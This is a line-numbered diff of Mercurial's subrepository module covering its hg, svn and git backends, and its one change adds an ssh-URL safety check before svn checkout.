1040 # 1. if the no_backup is not set, revert all modified
1040 # 1. if the no_backup is not set, revert all modified
1041 # files inside the subrepo
1041 # files inside the subrepo
1042 # 2. update the subrepo to the revision specified in
1042 # 2. update the subrepo to the revision specified in
1043 # the corresponding substate dictionary
1043 # the corresponding substate dictionary
1044 self.ui.status(_('reverting subrepo %s\n') % substate[0])
1044 self.ui.status(_('reverting subrepo %s\n') % substate[0])
1045 if not opts.get('no_backup'):
1045 if not opts.get('no_backup'):
1046 # Revert all files on the subrepo, creating backups
1046 # Revert all files on the subrepo, creating backups
1047 # Note that this will not recursively revert subrepos
1047 # Note that this will not recursively revert subrepos
1048 # We could do it if there was a set:subrepos() predicate
1048 # We could do it if there was a set:subrepos() predicate
1049 opts = opts.copy()
1049 opts = opts.copy()
1050 opts['date'] = None
1050 opts['date'] = None
1051 opts['rev'] = substate[1]
1051 opts['rev'] = substate[1]
1052
1052
1053 self.filerevert(*pats, **opts)
1053 self.filerevert(*pats, **opts)
1054
1054
1055 # Update the repo to the revision specified in the given substate
1055 # Update the repo to the revision specified in the given substate
1056 if not opts.get('dry_run'):
1056 if not opts.get('dry_run'):
1057 self.get(substate, overwrite=True)
1057 self.get(substate, overwrite=True)
1058
1058
1059 def filerevert(self, *pats, **opts):
1059 def filerevert(self, *pats, **opts):
1060 ctx = self._repo[opts['rev']]
1060 ctx = self._repo[opts['rev']]
1061 parents = self._repo.dirstate.parents()
1061 parents = self._repo.dirstate.parents()
1062 if opts.get('all'):
1062 if opts.get('all'):
1063 pats = ['set:modified()']
1063 pats = ['set:modified()']
1064 else:
1064 else:
1065 pats = []
1065 pats = []
1066 cmdutil.revert(self.ui, self._repo, ctx, parents, *pats, **opts)
1066 cmdutil.revert(self.ui, self._repo, ctx, parents, *pats, **opts)
1067
1067
1068 def shortid(self, revid):
1068 def shortid(self, revid):
1069 return revid[:12]
1069 return revid[:12]
1070
1070
1071 def verify(self):
1071 def verify(self):
1072 try:
1072 try:
1073 rev = self._state[1]
1073 rev = self._state[1]
1074 ctx = self._repo.unfiltered()[rev]
1074 ctx = self._repo.unfiltered()[rev]
1075 if ctx.hidden():
1075 if ctx.hidden():
1076 # Since hidden revisions aren't pushed/pulled, it seems worth an
1076 # Since hidden revisions aren't pushed/pulled, it seems worth an
1077 # explicit warning.
1077 # explicit warning.
1078 ui = self._repo.ui
1078 ui = self._repo.ui
1079 ui.warn(_("subrepo '%s' is hidden in revision %s\n") %
1079 ui.warn(_("subrepo '%s' is hidden in revision %s\n") %
1080 (self._relpath, node.short(self._ctx.node())))
1080 (self._relpath, node.short(self._ctx.node())))
1081 return 0
1081 return 0
1082 except error.RepoLookupError:
1082 except error.RepoLookupError:
1083 # A missing subrepo revision may be a case of needing to pull it, so
1083 # A missing subrepo revision may be a case of needing to pull it, so
1084 # don't treat this as an error.
1084 # don't treat this as an error.
1085 self._repo.ui.warn(_("subrepo '%s' not found in revision %s\n") %
1085 self._repo.ui.warn(_("subrepo '%s' not found in revision %s\n") %
1086 (self._relpath, node.short(self._ctx.node())))
1086 (self._relpath, node.short(self._ctx.node())))
1087 return 0
1087 return 0
1088
1088
1089 @propertycache
1089 @propertycache
1090 def wvfs(self):
1090 def wvfs(self):
1091 """return own wvfs for efficiency and consistency
1091 """return own wvfs for efficiency and consistency
1092 """
1092 """
1093 return self._repo.wvfs
1093 return self._repo.wvfs
1094
1094
1095 @propertycache
1095 @propertycache
1096 def _relpath(self):
1096 def _relpath(self):
1097 """return path to this subrepository as seen from outermost repository
1097 """return path to this subrepository as seen from outermost repository
1098 """
1098 """
1099 # Keep consistent dir separators by avoiding vfs.join(self._path)
1099 # Keep consistent dir separators by avoiding vfs.join(self._path)
1100 return reporelpath(self._repo)
1100 return reporelpath(self._repo)
1101
1101
1102 class svnsubrepo(abstractsubrepo):
1102 class svnsubrepo(abstractsubrepo):
1103 def __init__(self, ctx, path, state, allowcreate):
1103 def __init__(self, ctx, path, state, allowcreate):
1104 super(svnsubrepo, self).__init__(ctx, path)
1104 super(svnsubrepo, self).__init__(ctx, path)
1105 self._state = state
1105 self._state = state
1106 self._exe = util.findexe('svn')
1106 self._exe = util.findexe('svn')
1107 if not self._exe:
1107 if not self._exe:
1108 raise error.Abort(_("'svn' executable not found for subrepo '%s'")
1108 raise error.Abort(_("'svn' executable not found for subrepo '%s'")
1109 % self._path)
1109 % self._path)
1110
1110
1111 def _svncommand(self, commands, filename='', failok=False):
1111 def _svncommand(self, commands, filename='', failok=False):
1112 cmd = [self._exe]
1112 cmd = [self._exe]
1113 extrakw = {}
1113 extrakw = {}
1114 if not self.ui.interactive():
1114 if not self.ui.interactive():
1115 # Making stdin be a pipe should prevent svn from behaving
1115 # Making stdin be a pipe should prevent svn from behaving
1116 # interactively even if we can't pass --non-interactive.
1116 # interactively even if we can't pass --non-interactive.
1117 extrakw['stdin'] = subprocess.PIPE
1117 extrakw['stdin'] = subprocess.PIPE
1118 # Starting in svn 1.5 --non-interactive is a global flag
1118 # Starting in svn 1.5 --non-interactive is a global flag
1119 # instead of being per-command, but we need to support 1.4 so
1119 # instead of being per-command, but we need to support 1.4 so
1120 # we have to be intelligent about what commands take
1120 # we have to be intelligent about what commands take
1121 # --non-interactive.
1121 # --non-interactive.
1122 if commands[0] in ('update', 'checkout', 'commit'):
1122 if commands[0] in ('update', 'checkout', 'commit'):
1123 cmd.append('--non-interactive')
1123 cmd.append('--non-interactive')
1124 cmd.extend(commands)
1124 cmd.extend(commands)
1125 if filename is not None:
1125 if filename is not None:
1126 path = self.wvfs.reljoin(self._ctx.repo().origroot,
1126 path = self.wvfs.reljoin(self._ctx.repo().origroot,
1127 self._path, filename)
1127 self._path, filename)
1128 cmd.append(path)
1128 cmd.append(path)
1129 env = dict(encoding.environ)
1129 env = dict(encoding.environ)
1130 # Avoid localized output, preserve current locale for everything else.
1130 # Avoid localized output, preserve current locale for everything else.
1131 lc_all = env.get('LC_ALL')
1131 lc_all = env.get('LC_ALL')
1132 if lc_all:
1132 if lc_all:
1133 env['LANG'] = lc_all
1133 env['LANG'] = lc_all
1134 del env['LC_ALL']
1134 del env['LC_ALL']
1135 env['LC_MESSAGES'] = 'C'
1135 env['LC_MESSAGES'] = 'C'
1136 p = subprocess.Popen(cmd, bufsize=-1, close_fds=util.closefds,
1136 p = subprocess.Popen(cmd, bufsize=-1, close_fds=util.closefds,
1137 stdout=subprocess.PIPE, stderr=subprocess.PIPE,
1137 stdout=subprocess.PIPE, stderr=subprocess.PIPE,
1138 universal_newlines=True, env=env, **extrakw)
1138 universal_newlines=True, env=env, **extrakw)
1139 stdout, stderr = p.communicate()
1139 stdout, stderr = p.communicate()
1140 stderr = stderr.strip()
1140 stderr = stderr.strip()
1141 if not failok:
1141 if not failok:
1142 if p.returncode:
1142 if p.returncode:
1143 raise error.Abort(stderr or 'exited with code %d'
1143 raise error.Abort(stderr or 'exited with code %d'
1144 % p.returncode)
1144 % p.returncode)
1145 if stderr:
1145 if stderr:
1146 self.ui.warn(stderr + '\n')
1146 self.ui.warn(stderr + '\n')
1147 return stdout, stderr
1147 return stdout, stderr
1148
1148
1149 @propertycache
1149 @propertycache
1150 def _svnversion(self):
1150 def _svnversion(self):
1151 output, err = self._svncommand(['--version', '--quiet'], filename=None)
1151 output, err = self._svncommand(['--version', '--quiet'], filename=None)
1152 m = re.search(r'^(\d+)\.(\d+)', output)
1152 m = re.search(r'^(\d+)\.(\d+)', output)
1153 if not m:
1153 if not m:
1154 raise error.Abort(_('cannot retrieve svn tool version'))
1154 raise error.Abort(_('cannot retrieve svn tool version'))
1155 return (int(m.group(1)), int(m.group(2)))
1155 return (int(m.group(1)), int(m.group(2)))
1156
1156
1157 def _wcrevs(self):
1157 def _wcrevs(self):
1158 # Get the working directory revision as well as the last
1158 # Get the working directory revision as well as the last
1159 # commit revision so we can compare the subrepo state with
1159 # commit revision so we can compare the subrepo state with
1160 # both. We used to store the working directory one.
1160 # both. We used to store the working directory one.
1161 output, err = self._svncommand(['info', '--xml'])
1161 output, err = self._svncommand(['info', '--xml'])
1162 doc = xml.dom.minidom.parseString(output)
1162 doc = xml.dom.minidom.parseString(output)
1163 entries = doc.getElementsByTagName('entry')
1163 entries = doc.getElementsByTagName('entry')
1164 lastrev, rev = '0', '0'
1164 lastrev, rev = '0', '0'
1165 if entries:
1165 if entries:
1166 rev = str(entries[0].getAttribute('revision')) or '0'
1166 rev = str(entries[0].getAttribute('revision')) or '0'
1167 commits = entries[0].getElementsByTagName('commit')
1167 commits = entries[0].getElementsByTagName('commit')
1168 if commits:
1168 if commits:
1169 lastrev = str(commits[0].getAttribute('revision')) or '0'
1169 lastrev = str(commits[0].getAttribute('revision')) or '0'
1170 return (lastrev, rev)
1170 return (lastrev, rev)
1171
1171
1172 def _wcrev(self):
1172 def _wcrev(self):
1173 return self._wcrevs()[0]
1173 return self._wcrevs()[0]
1174
1174
1175 def _wcchanged(self):
1175 def _wcchanged(self):
1176 """Return (changes, extchanges, missing) where changes is True
1176 """Return (changes, extchanges, missing) where changes is True
1177 if the working directory was changed, extchanges is
1177 if the working directory was changed, extchanges is
1178 True if any of these changes concern an external entry and missing
1178 True if any of these changes concern an external entry and missing
1179 is True if any change is a missing entry.
1179 is True if any change is a missing entry.
1180 """
1180 """
1181 output, err = self._svncommand(['status', '--xml'])
1181 output, err = self._svncommand(['status', '--xml'])
1182 externals, changes, missing = [], [], []
1182 externals, changes, missing = [], [], []
1183 doc = xml.dom.minidom.parseString(output)
1183 doc = xml.dom.minidom.parseString(output)
1184 for e in doc.getElementsByTagName('entry'):
1184 for e in doc.getElementsByTagName('entry'):
1185 s = e.getElementsByTagName('wc-status')
1185 s = e.getElementsByTagName('wc-status')
1186 if not s:
1186 if not s:
1187 continue
1187 continue
1188 item = s[0].getAttribute('item')
1188 item = s[0].getAttribute('item')
1189 props = s[0].getAttribute('props')
1189 props = s[0].getAttribute('props')
1190 path = e.getAttribute('path')
1190 path = e.getAttribute('path')
1191 if item == 'external':
1191 if item == 'external':
1192 externals.append(path)
1192 externals.append(path)
1193 elif item == 'missing':
1193 elif item == 'missing':
1194 missing.append(path)
1194 missing.append(path)
1195 if (item not in ('', 'normal', 'unversioned', 'external')
1195 if (item not in ('', 'normal', 'unversioned', 'external')
1196 or props not in ('', 'none', 'normal')):
1196 or props not in ('', 'none', 'normal')):
1197 changes.append(path)
1197 changes.append(path)
1198 for path in changes:
1198 for path in changes:
1199 for ext in externals:
1199 for ext in externals:
1200 if path == ext or path.startswith(ext + pycompat.ossep):
1200 if path == ext or path.startswith(ext + pycompat.ossep):
1201 return True, True, bool(missing)
1201 return True, True, bool(missing)
1202 return bool(changes), False, bool(missing)
1202 return bool(changes), False, bool(missing)
1203
1203
1204 def dirty(self, ignoreupdate=False):
1204 def dirty(self, ignoreupdate=False):
1205 if not self._wcchanged()[0]:
1205 if not self._wcchanged()[0]:
1206 if self._state[1] in self._wcrevs() or ignoreupdate:
1206 if self._state[1] in self._wcrevs() or ignoreupdate:
1207 return False
1207 return False
1208 return True
1208 return True
1209
1209
1210 def basestate(self):
1210 def basestate(self):
1211 lastrev, rev = self._wcrevs()
1211 lastrev, rev = self._wcrevs()
1212 if lastrev != rev:
1212 if lastrev != rev:
1213 # Last committed rev is not the same than rev. We would
1213 # Last committed rev is not the same than rev. We would
1214 # like to take lastrev but we do not know if the subrepo
1214 # like to take lastrev but we do not know if the subrepo
1215 # URL exists at lastrev. Test it and fallback to rev it
1215 # URL exists at lastrev. Test it and fallback to rev it
1216 # is not there.
1216 # is not there.
1217 try:
1217 try:
1218 self._svncommand(['list', '%s@%s' % (self._state[0], lastrev)])
1218 self._svncommand(['list', '%s@%s' % (self._state[0], lastrev)])
1219 return lastrev
1219 return lastrev
1220 except error.Abort:
1220 except error.Abort:
1221 pass
1221 pass
1222 return rev
1222 return rev
1223
1223
1224 @annotatesubrepoerror
1224 @annotatesubrepoerror
1225 def commit(self, text, user, date):
1225 def commit(self, text, user, date):
1226 # user and date are out of our hands since svn is centralized
1226 # user and date are out of our hands since svn is centralized
1227 changed, extchanged, missing = self._wcchanged()
1227 changed, extchanged, missing = self._wcchanged()
1228 if not changed:
1228 if not changed:
1229 return self.basestate()
1229 return self.basestate()
1230 if extchanged:
1230 if extchanged:
1231 # Do not try to commit externals
1231 # Do not try to commit externals
1232 raise error.Abort(_('cannot commit svn externals'))
1232 raise error.Abort(_('cannot commit svn externals'))
1233 if missing:
1233 if missing:
1234 # svn can commit with missing entries but aborting like hg
1234 # svn can commit with missing entries but aborting like hg
1235 # seems a better approach.
1235 # seems a better approach.
1236 raise error.Abort(_('cannot commit missing svn entries'))
1236 raise error.Abort(_('cannot commit missing svn entries'))
1237 commitinfo, err = self._svncommand(['commit', '-m', text])
1237 commitinfo, err = self._svncommand(['commit', '-m', text])
1238 self.ui.status(commitinfo)
1238 self.ui.status(commitinfo)
1239 newrev = re.search('Committed revision ([0-9]+).', commitinfo)
1239 newrev = re.search('Committed revision ([0-9]+).', commitinfo)
1240 if not newrev:
1240 if not newrev:
1241 if not commitinfo.strip():
1241 if not commitinfo.strip():
1242 # Sometimes, our definition of "changed" differs from
1242 # Sometimes, our definition of "changed" differs from
1243 # svn one. For instance, svn ignores missing files
1243 # svn one. For instance, svn ignores missing files
1244 # when committing. If there are only missing files, no
1244 # when committing. If there are only missing files, no
1245 # commit is made, no output and no error code.
1245 # commit is made, no output and no error code.
1246 raise error.Abort(_('failed to commit svn changes'))
1246 raise error.Abort(_('failed to commit svn changes'))
1247 raise error.Abort(commitinfo.splitlines()[-1])
1247 raise error.Abort(commitinfo.splitlines()[-1])
1248 newrev = newrev.groups()[0]
1248 newrev = newrev.groups()[0]
1249 self.ui.status(self._svncommand(['update', '-r', newrev])[0])
1249 self.ui.status(self._svncommand(['update', '-r', newrev])[0])
1250 return newrev
1250 return newrev
1251
1251
1252 @annotatesubrepoerror
1252 @annotatesubrepoerror
1253 def remove(self):
1253 def remove(self):
1254 if self.dirty():
1254 if self.dirty():
1255 self.ui.warn(_('not removing repo %s because '
1255 self.ui.warn(_('not removing repo %s because '
1256 'it has changes.\n') % self._path)
1256 'it has changes.\n') % self._path)
1257 return
1257 return
1258 self.ui.note(_('removing subrepo %s\n') % self._path)
1258 self.ui.note(_('removing subrepo %s\n') % self._path)
1259
1259
1260 self.wvfs.rmtree(forcibly=True)
1260 self.wvfs.rmtree(forcibly=True)
1261 try:
1261 try:
1262 pwvfs = self._ctx.repo().wvfs
1262 pwvfs = self._ctx.repo().wvfs
1263 pwvfs.removedirs(pwvfs.dirname(self._path))
1263 pwvfs.removedirs(pwvfs.dirname(self._path))
1264 except OSError:
1264 except OSError:
1265 pass
1265 pass
1266
1266
1267 @annotatesubrepoerror
1267 @annotatesubrepoerror
1268 def get(self, state, overwrite=False):
1268 def get(self, state, overwrite=False):
1269 if overwrite:
1269 if overwrite:
1270 self._svncommand(['revert', '--recursive'])
1270 self._svncommand(['revert', '--recursive'])
1271 args = ['checkout']
1271 args = ['checkout']
1272 if self._svnversion >= (1, 5):
1272 if self._svnversion >= (1, 5):
1273 args.append('--force')
1273 args.append('--force')
1274 # The revision must be specified at the end of the URL to properly
1274 # The revision must be specified at the end of the URL to properly
1275 # update to a directory which has since been deleted and recreated.
1275 # update to a directory which has since been deleted and recreated.
1276 args.append('%s@%s' % (state[0], state[1]))
1276 args.append('%s@%s' % (state[0], state[1]))
1277
1278 # SEC: check that the ssh url is safe
1279 util.checksafessh(state[0])
1280
1277 status, err = self._svncommand(args, failok=True)
1281 status, err = self._svncommand(args, failok=True)
1278 _sanitize(self.ui, self.wvfs, '.svn')
1282 _sanitize(self.ui, self.wvfs, '.svn')
1279 if not re.search('Checked out revision [0-9]+.', status):
1283 if not re.search('Checked out revision [0-9]+.', status):
1280 if ('is already a working copy for a different URL' in err
1284 if ('is already a working copy for a different URL' in err
1281 and (self._wcchanged()[:2] == (False, False))):
1285 and (self._wcchanged()[:2] == (False, False))):
1282 # obstructed but clean working copy, so just blow it away.
1286 # obstructed but clean working copy, so just blow it away.
1283 self.remove()
1287 self.remove()
1284 self.get(state, overwrite=False)
1288 self.get(state, overwrite=False)
1285 return
1289 return
1286 raise error.Abort((status or err).splitlines()[-1])
1290 raise error.Abort((status or err).splitlines()[-1])
1287 self.ui.status(status)
1291 self.ui.status(status)
1288
1292
1289 @annotatesubrepoerror
1293 @annotatesubrepoerror
1290 def merge(self, state):
1294 def merge(self, state):
1291 old = self._state[1]
1295 old = self._state[1]
1292 new = state[1]
1296 new = state[1]
1293 wcrev = self._wcrev()
1297 wcrev = self._wcrev()
1294 if new != wcrev:
1298 if new != wcrev:
1295 dirty = old == wcrev or self._wcchanged()[0]
1299 dirty = old == wcrev or self._wcchanged()[0]
1296 if _updateprompt(self.ui, self, dirty, wcrev, new):
1300 if _updateprompt(self.ui, self, dirty, wcrev, new):
1297 self.get(state, False)
1301 self.get(state, False)
1298
1302
1299 def push(self, opts):
1303 def push(self, opts):
1300 # push is a no-op for SVN
1304 # push is a no-op for SVN
1301 return True
1305 return True
1302
1306
1303 @annotatesubrepoerror
1307 @annotatesubrepoerror
1304 def files(self):
1308 def files(self):
1305 output = self._svncommand(['list', '--recursive', '--xml'])[0]
1309 output = self._svncommand(['list', '--recursive', '--xml'])[0]
1306 doc = xml.dom.minidom.parseString(output)
1310 doc = xml.dom.minidom.parseString(output)
1307 paths = []
1311 paths = []
1308 for e in doc.getElementsByTagName('entry'):
1312 for e in doc.getElementsByTagName('entry'):
1309 kind = str(e.getAttribute('kind'))
1313 kind = str(e.getAttribute('kind'))
1310 if kind != 'file':
1314 if kind != 'file':
1311 continue
1315 continue
1312 name = ''.join(c.data for c
1316 name = ''.join(c.data for c
1313 in e.getElementsByTagName('name')[0].childNodes
1317 in e.getElementsByTagName('name')[0].childNodes
1314 if c.nodeType == c.TEXT_NODE)
1318 if c.nodeType == c.TEXT_NODE)
1315 paths.append(name.encode('utf-8'))
1319 paths.append(name.encode('utf-8'))
1316 return paths
1320 return paths
1317
1321
1318 def filedata(self, name, decode):
1322 def filedata(self, name, decode):
1319 return self._svncommand(['cat'], name)[0]
1323 return self._svncommand(['cat'], name)[0]
1320
1324
1321
1325
1322 class gitsubrepo(abstractsubrepo):
1326 class gitsubrepo(abstractsubrepo):
1323 def __init__(self, ctx, path, state, allowcreate):
1327 def __init__(self, ctx, path, state, allowcreate):
1324 super(gitsubrepo, self).__init__(ctx, path)
1328 super(gitsubrepo, self).__init__(ctx, path)
1325 self._state = state
1329 self._state = state
1326 self._abspath = ctx.repo().wjoin(path)
1330 self._abspath = ctx.repo().wjoin(path)
1327 self._subparent = ctx.repo()
1331 self._subparent = ctx.repo()
1328 self._ensuregit()
1332 self._ensuregit()
1329
1333
1330 def _ensuregit(self):
1334 def _ensuregit(self):
1331 try:
1335 try:
1332 self._gitexecutable = 'git'
1336 self._gitexecutable = 'git'
1333 out, err = self._gitnodir(['--version'])
1337 out, err = self._gitnodir(['--version'])
1334 except OSError as e:
1338 except OSError as e:
1335 genericerror = _("error executing git for subrepo '%s': %s")
1339 genericerror = _("error executing git for subrepo '%s': %s")
1336 notfoundhint = _("check git is installed and in your PATH")
1340 notfoundhint = _("check git is installed and in your PATH")
1337 if e.errno != errno.ENOENT:
1341 if e.errno != errno.ENOENT:
1338 raise error.Abort(genericerror % (self._path, e.strerror))
1342 raise error.Abort(genericerror % (self._path, e.strerror))
1339 elif pycompat.osname == 'nt':
1343 elif pycompat.osname == 'nt':
1340 try:
1344 try:
1341 self._gitexecutable = 'git.cmd'
1345 self._gitexecutable = 'git.cmd'
1342 out, err = self._gitnodir(['--version'])
1346 out, err = self._gitnodir(['--version'])
1343 except OSError as e2:
1347 except OSError as e2:
1344 if e2.errno == errno.ENOENT:
1348 if e2.errno == errno.ENOENT:
1345 raise error.Abort(_("couldn't find 'git' or 'git.cmd'"
1349 raise error.Abort(_("couldn't find 'git' or 'git.cmd'"
1346 " for subrepo '%s'") % self._path,
1350 " for subrepo '%s'") % self._path,
1347 hint=notfoundhint)
1351 hint=notfoundhint)
1348 else:
1352 else:
1349 raise error.Abort(genericerror % (self._path,
1353 raise error.Abort(genericerror % (self._path,
1350 e2.strerror))
1354 e2.strerror))
1351 else:
1355 else:
1352 raise error.Abort(_("couldn't find git for subrepo '%s'")
1356 raise error.Abort(_("couldn't find git for subrepo '%s'")
1353 % self._path, hint=notfoundhint)
1357 % self._path, hint=notfoundhint)
1354 versionstatus = self._checkversion(out)
1358 versionstatus = self._checkversion(out)
1355 if versionstatus == 'unknown':
1359 if versionstatus == 'unknown':
1356 self.ui.warn(_('cannot retrieve git version\n'))
1360 self.ui.warn(_('cannot retrieve git version\n'))
1357 elif versionstatus == 'abort':
1361 elif versionstatus == 'abort':
1358 raise error.Abort(_('git subrepo requires at least 1.6.0 or later'))
1362 raise error.Abort(_('git subrepo requires at least 1.6.0 or later'))
1359 elif versionstatus == 'warning':
1363 elif versionstatus == 'warning':
1360 self.ui.warn(_('git subrepo requires at least 1.6.0 or later\n'))
1364 self.ui.warn(_('git subrepo requires at least 1.6.0 or later\n'))
1361
1365
1362 @staticmethod
1366 @staticmethod
1363 def _gitversion(out):
1367 def _gitversion(out):
1364 m = re.search(r'^git version (\d+)\.(\d+)\.(\d+)', out)
1368 m = re.search(r'^git version (\d+)\.(\d+)\.(\d+)', out)
1365 if m:
1369 if m:
1366 return (int(m.group(1)), int(m.group(2)), int(m.group(3)))
1370 return (int(m.group(1)), int(m.group(2)), int(m.group(3)))
1367
1371
1368 m = re.search(r'^git version (\d+)\.(\d+)', out)
1372 m = re.search(r'^git version (\d+)\.(\d+)', out)
1369 if m:
1373 if m:
1370 return (int(m.group(1)), int(m.group(2)), 0)
1374 return (int(m.group(1)), int(m.group(2)), 0)
1371
1375
1372 return -1
1376 return -1
1373
1377
1374 @staticmethod
1378 @staticmethod
1375 def _checkversion(out):
1379 def _checkversion(out):
1376 '''ensure git version is new enough
1380 '''ensure git version is new enough
1377
1381
1378 >>> _checkversion = gitsubrepo._checkversion
1382 >>> _checkversion = gitsubrepo._checkversion
1379 >>> _checkversion('git version 1.6.0')
1383 >>> _checkversion('git version 1.6.0')
1380 'ok'
1384 'ok'
1381 >>> _checkversion('git version 1.8.5')
1385 >>> _checkversion('git version 1.8.5')
1382 'ok'
1386 'ok'
1383 >>> _checkversion('git version 1.4.0')
1387 >>> _checkversion('git version 1.4.0')
1384 'abort'
1388 'abort'
1385 >>> _checkversion('git version 1.5.0')
1389 >>> _checkversion('git version 1.5.0')
1386 'warning'
1390 'warning'
1387 >>> _checkversion('git version 1.9-rc0')
1391 >>> _checkversion('git version 1.9-rc0')
1388 'ok'
1392 'ok'
1389 >>> _checkversion('git version 1.9.0.265.g81cdec2')
1393 >>> _checkversion('git version 1.9.0.265.g81cdec2')
1390 'ok'
1394 'ok'
1391 >>> _checkversion('git version 1.9.0.GIT')
1395 >>> _checkversion('git version 1.9.0.GIT')
1392 'ok'
1396 'ok'
1393 >>> _checkversion('git version 12345')
1397 >>> _checkversion('git version 12345')
1394 'unknown'
1398 'unknown'
1395 >>> _checkversion('no')
1399 >>> _checkversion('no')
1396 'unknown'
1400 'unknown'
1397 '''
1401 '''
1398 version = gitsubrepo._gitversion(out)
1402 version = gitsubrepo._gitversion(out)
1399 # git 1.4.0 can't work at all, but 1.5.X can in at least some cases,
1403 # git 1.4.0 can't work at all, but 1.5.X can in at least some cases,
1400 # despite the docstring comment. For now, error on 1.4.0, warn on
1404 # despite the docstring comment. For now, error on 1.4.0, warn on
1401 # 1.5.0 but attempt to continue.
1405 # 1.5.0 but attempt to continue.
1402 if version == -1:
1406 if version == -1:
1403 return 'unknown'
1407 return 'unknown'
1404 if version < (1, 5, 0):
1408 if version < (1, 5, 0):
1405 return 'abort'
1409 return 'abort'
1406 elif version < (1, 6, 0):
1410 elif version < (1, 6, 0):
1407 return 'warning'
1411 return 'warning'
1408 return 'ok'
1412 return 'ok'
1409
1413
1410 def _gitcommand(self, commands, env=None, stream=False):
1414 def _gitcommand(self, commands, env=None, stream=False):
1411 return self._gitdir(commands, env=env, stream=stream)[0]
1415 return self._gitdir(commands, env=env, stream=stream)[0]
1412
1416
1413 def _gitdir(self, commands, env=None, stream=False):
1417 def _gitdir(self, commands, env=None, stream=False):
1414 return self._gitnodir(commands, env=env, stream=stream,
1418 return self._gitnodir(commands, env=env, stream=stream,
1415 cwd=self._abspath)
1419 cwd=self._abspath)
1416
1420
1417 def _gitnodir(self, commands, env=None, stream=False, cwd=None):
1421 def _gitnodir(self, commands, env=None, stream=False, cwd=None):
1418 """Calls the git command
1422 """Calls the git command
1419
1423
1420 The methods tries to call the git command. versions prior to 1.6.0
1424 The methods tries to call the git command. versions prior to 1.6.0
1421 are not supported and very probably fail.
1425 are not supported and very probably fail.
1422 """
1426 """
1423 self.ui.debug('%s: git %s\n' % (self._relpath, ' '.join(commands)))
1427 self.ui.debug('%s: git %s\n' % (self._relpath, ' '.join(commands)))
1424 if env is None:
1428 if env is None:
1425 env = encoding.environ.copy()
1429 env = encoding.environ.copy()
1426 # disable localization for Git output (issue5176)
1430 # disable localization for Git output (issue5176)
1427 env['LC_ALL'] = 'C'
1431 env['LC_ALL'] = 'C'
1428 # fix for Git CVE-2015-7545
1432 # fix for Git CVE-2015-7545
1429 if 'GIT_ALLOW_PROTOCOL' not in env:
1433 if 'GIT_ALLOW_PROTOCOL' not in env:
1430 env['GIT_ALLOW_PROTOCOL'] = 'file:git:http:https:ssh'
1434 env['GIT_ALLOW_PROTOCOL'] = 'file:git:http:https:ssh'
1431 # unless ui.quiet is set, print git's stderr,
1435 # unless ui.quiet is set, print git's stderr,
1432 # which is mostly progress and useful info
1436 # which is mostly progress and useful info
1433 errpipe = None
1437 errpipe = None
1434 if self.ui.quiet:
1438 if self.ui.quiet:
1435 errpipe = open(os.devnull, 'w')
1439 errpipe = open(os.devnull, 'w')
1436 if self.ui._colormode and len(commands) and commands[0] == "diff":
1440 if self.ui._colormode and len(commands) and commands[0] == "diff":
1437 # insert the argument in the front,
1441 # insert the argument in the front,
1438 # the end of git diff arguments is used for paths
1442 # the end of git diff arguments is used for paths
1439 commands.insert(1, '--color')
1443 commands.insert(1, '--color')
1440 p = subprocess.Popen([self._gitexecutable] + commands, bufsize=-1,
1444 p = subprocess.Popen([self._gitexecutable] + commands, bufsize=-1,
1441 cwd=cwd, env=env, close_fds=util.closefds,
1445 cwd=cwd, env=env, close_fds=util.closefds,
1442 stdout=subprocess.PIPE, stderr=errpipe)
1446 stdout=subprocess.PIPE, stderr=errpipe)
1443 if stream:
1447 if stream:
1444 return p.stdout, None
1448 return p.stdout, None
1445
1449
1446 retdata = p.stdout.read().strip()
1450 retdata = p.stdout.read().strip()
1447 # wait for the child to exit to avoid race condition.
1451 # wait for the child to exit to avoid race condition.
1448 p.wait()
1452 p.wait()
1449
1453
1450 if p.returncode != 0 and p.returncode != 1:
1454 if p.returncode != 0 and p.returncode != 1:
1451 # there are certain error codes that are ok
1455 # there are certain error codes that are ok
1452 command = commands[0]
1456 command = commands[0]
1453 if command in ('cat-file', 'symbolic-ref'):
1457 if command in ('cat-file', 'symbolic-ref'):
1454 return retdata, p.returncode
1458 return retdata, p.returncode
1455 # for all others, abort
1459 # for all others, abort
1456 raise error.Abort(_('git %s error %d in %s') %
1460 raise error.Abort(_('git %s error %d in %s') %
1457 (command, p.returncode, self._relpath))
1461 (command, p.returncode, self._relpath))
1458
1462
1459 return retdata, p.returncode
1463 return retdata, p.returncode
1460
1464
1461 def _gitmissing(self):
1465 def _gitmissing(self):
1462 return not self.wvfs.exists('.git')
1466 return not self.wvfs.exists('.git')
1463
1467
1464 def _gitstate(self):
1468 def _gitstate(self):
1465 return self._gitcommand(['rev-parse', 'HEAD'])
1469 return self._gitcommand(['rev-parse', 'HEAD'])
1466
1470
1467 def _gitcurrentbranch(self):
1471 def _gitcurrentbranch(self):
1468 current, err = self._gitdir(['symbolic-ref', 'HEAD', '--quiet'])
1472 current, err = self._gitdir(['symbolic-ref', 'HEAD', '--quiet'])
1469 if err:
1473 if err:
1470 current = None
1474 current = None
1471 return current
1475 return current
1472
1476
1473 def _gitremote(self, remote):
1477 def _gitremote(self, remote):
1474 out = self._gitcommand(['remote', 'show', '-n', remote])
1478 out = self._gitcommand(['remote', 'show', '-n', remote])
1475 line = out.split('\n')[1]
1479 line = out.split('\n')[1]
1476 i = line.index('URL: ') + len('URL: ')
1480 i = line.index('URL: ') + len('URL: ')
1477 return line[i:]
1481 return line[i:]
1478
1482
1479 def _githavelocally(self, revision):
1483 def _githavelocally(self, revision):
1480 out, code = self._gitdir(['cat-file', '-e', revision])
1484 out, code = self._gitdir(['cat-file', '-e', revision])
1481 return code == 0
1485 return code == 0
1482
1486
1483 def _gitisancestor(self, r1, r2):
1487 def _gitisancestor(self, r1, r2):
1484 base = self._gitcommand(['merge-base', r1, r2])
1488 base = self._gitcommand(['merge-base', r1, r2])
1485 return base == r1
1489 return base == r1
1486
1490
1487 def _gitisbare(self):
1491 def _gitisbare(self):
1488 return self._gitcommand(['config', '--bool', 'core.bare']) == 'true'
1492 return self._gitcommand(['config', '--bool', 'core.bare']) == 'true'
1489
1493
1490 def _gitupdatestat(self):
1494 def _gitupdatestat(self):
1491 """This must be run before git diff-index.
1495 """This must be run before git diff-index.
1492 diff-index only looks at changes to file stat;
1496 diff-index only looks at changes to file stat;
1493 this command looks at file contents and updates the stat."""
1497 this command looks at file contents and updates the stat."""
1494 self._gitcommand(['update-index', '-q', '--refresh'])
1498 self._gitcommand(['update-index', '-q', '--refresh'])
1495
1499
1496 def _gitbranchmap(self):
1500 def _gitbranchmap(self):
1497 '''returns 2 things:
